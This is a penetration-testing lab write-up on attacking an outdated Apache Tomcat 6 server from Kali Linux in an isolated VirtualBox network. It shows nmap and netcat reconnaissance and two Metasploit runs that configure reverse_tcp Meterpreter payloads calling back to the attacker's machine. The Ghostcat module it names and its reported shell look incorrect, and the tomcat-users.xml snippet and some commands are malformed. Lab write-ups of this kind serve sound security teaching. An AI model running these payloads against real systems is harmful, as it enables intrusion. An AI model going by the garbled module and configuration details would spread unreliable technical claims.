Apache Tomcat6 is a widely used open source Java Servlet container and web server that supports the deployment of Java based web applications. Despite its popularity, Tomcat6 is outdated and no longer receives official security updates. This virtual lab environment was prepared using Oracle VirtualBox to simulate an internal network scenario for a penetration testing of a Apache Tomcat6.

Two virtual machines were connected through VirtualBox’s NAT Network mode to ensure isolated communication: Ubuntu Server VM served as the vulnerable target (Victim) and configured with a legacy version of Apache Tomcat (v6.0.41) known for its exposure to critical vulnerabilities. Kali Linux VM acted as the attacker machine.

Both VMs were assigned with static IPs within the range 192.168.50.0/24:
*Kali (Attacker) IP: 192.168.50.10
*Ubuntu Server (Victim) IP : 192.168.50.20

This configuration was done as;
For Kali VM, Static IP was added through Advanced Network Configuration and DHCP is set to Manual. For Ubuntu VM, 00-netcfg.yaml manifest is set with enp0s8 adapter to use the above mentioned IP with DHCP disabled.

Once assinged, ping commands are issued from kali machine (The Attacker) to ubuntu server running tomcat6 (The Victim) to test network reachability.

The target VM was first updated and configured with the necessary Java dependencies required for Tomcat 6 to run which is OpenJDK 8. This environment configuration was done using:

sudo apt update
sudo apt install openjdk-8-jdk -y

To check the java version running, invoke;

java --version

If it is not, OpenJDK 8 but something else;

sudo update-alternatives - config java

Select OpenJDK 8 as the default and apply.
Once Java was in place, the Tomcat 6 binary was downloaded and extracted in the /opt directory:

sudo wget https://archive.apache.org/dist/tomcat/tomcat-6/v6.0.41/bin/apache-tomcat-6.0.41.tar.gz
sudo tar -xzf apache-tomcat-6.0.41.tar.gz
sudo mv apache-tomcat-6.0.41 tomcat6
sudo chmod +x /opt/tomcat6/bin/*.sh

To configure users for manager portal, access tomcat-users.xml and add the following entries to create a user on the role of manager-script priviledge level;

<tomcat-users>
<role rolename="manager-script">
<user username="tomcat" password="tomcat" roles="manager-script">
</tomcat-users>

Tomcat was then started using its startup script:

cd /opt/tomcat6/bin
sudo ./startup.sh

To verify successful deployment, Tomcat’s listening port and active processes were confirmed using following commands;

sudo netstat -tulnp | grep 8080
ps aux | grep tomcat

Upon successful installation,we can issue curl command to fetch the status info of running Apache Tomcat6 ( or just simply browse to http://localhost:8809 if your server environemnt provides a GUI ).

From the attacking Kali VM, the target machine’s IP address (192.168.50.20) was verified for basic reachability using:

ping 192.168.50.20

A check for SMTP service on port 25 was also performed using Netcat

nc -vn 192.168.50.20 25

The Tomcat web interface can also be accessed to confirm the HTTP service on port 8080: http://192.168.50.20:8080

To perform the service accesibility through Nmap, the following commands can be used;

For service detection;

nmap -sV 192.168.50.20

or to check open ports;

nmap -Pn 192.168.50.20

The Metasploit Framework is a widely used open source platform that provides a collection of modules to identify, exploit, and validate vulnerabilities in remote systems. It can be accessed using the msfconsole command in Kali Linux and it enables interactive execution of exploits, configuration of payloads, and management of sessions in real time.

By conducting a Vulnerability Assessment from the Kali VM, it could be identifed that the Victim is vulnerable to the following critical/ high vulnerabilties:
1. Apache Tomcat AJP Ghostcat (CVE-2020–1938)
2. Apache Tomcat Default Files and Interfaces

Vulnerability 1: Apache Tomcat AJP Ghostcat (CVE-2020–1938)
The first vulnerability targeted was Ghostcat, a critical flaw affecting the Apache JServ Protocol (AJP) connector. When the AJP port (usually 8009) is exposed to untrusted networks, arbitrary file inclusion or code execution can be achieved through this vulnerability.

Using nmap, it was discovered that port 8009 was open on the target:

nmap -sV -p 8009 192.168.50.20

Metasploit’s Ghostcat exploit module was then used from the Kali (the Attacker):

To open the metasploit framework;

msfconsole

To configure and start the attack;

use exploit/multi/http/tomcat_ajp_upload_bypass
set RHOSTS 192.168.50.20
set RPORT 8009
set LHOST 192.168.50.10
set LPORT 4444
set payload java/meterpreter/reverse_tcp
exploit

This resulted in a successful Meterpreter session, proving that the vulnerability could be exploited for remote code execution through the insecure AJP service.

Vulnerability 2: Apache Tomcat Default Files and Interfaces
Default installations of Apache Tomcat often include unsecured example files and administrative web interfaces. If not properly locked down, these can be leveraged for unauthorized access or file upload vulnerabilities.

Using nmap, it was reconfirmed that port 8080 was open on the target:

nmap -sV -p 8080 192.168.50.20

Attempts were made to access the manager interface by browsing to http://192.168.50.20:8080/manager/html but access was denied.

Metasploit was used to exploit this interface through a exploit and a payload:

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 192.168.50.20
set RPORT 8080
set HttpUsername tomcat
set HttpPassword tomcat
set TARGETURI /manager/html
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.50.10
set LPORT 4444
exploit

The exploit attempt failed with an unexpected server response : Unable to access the Tomcat Manager, indicating the upload endpoint was inaccessible.

The main objective of this internal lab exercise was to demonstrate how legacy services such as Apache Tomcat 6 can pose significant security risks when exposed with default configurations even with no authentication attempt taken by the attacker through a credential brute force or password guessing. Of the two vulnerabilities tested, Ghostcat proved to be the most impactful, allowing for full remote access through the AJP connector meanwhile the default Tomcat files offered limited insight but did not lead to successful exploitation.

Therefore, it is crucial not to rely on legacy systems and instead upgrade to more secure and supported versions. However, if a business requirement necessitates the use of such systems; for example an application that only runs on Apache Tomcat 6 , then it becomes essential to properly harden and secure the environment to minimize potential risks.